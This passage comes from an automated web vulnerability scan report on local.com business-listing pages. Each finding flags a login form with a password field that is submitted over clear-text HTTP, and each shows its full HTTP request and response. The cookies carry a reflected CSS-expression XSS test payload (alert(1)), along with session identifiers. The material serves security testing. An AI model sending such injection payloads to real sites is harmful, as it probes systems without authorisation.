<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Hillcrest Bank in Dallas, TX
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 116910
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:00 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186605902360; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/
Content-Length: 116910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Sterling Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39485
Date: Thu, 03 Feb 2011 16:38:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:18 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Amegy Bank in Dallas, TX - (
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 40029
Date: Thu, 03 Feb 2011 16:37:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:23 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 40029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cet Products & Liquidators in
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39437
Date: Thu, 03 Feb 2011 16:37:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Equity Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39591
Date: Thu, 03 Feb 2011 16:37:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Hillcrest Bank in Dallas, TX
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39493
Date: Thu, 03 Feb 2011 16:37:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:50 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Sterling Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.13. http://www.local.com/business/results/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/results/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 132916
Date: Thu, 03 Feb 2011 16:40:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:39:59 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fbusiness%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 132916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.14. http://www.local.com/contact.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /contact.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /contact.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 27733
Date: Thu, 03 Feb 2011 16:53:38 GMT
Content-Length: 27733
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:38 GMT; path=/
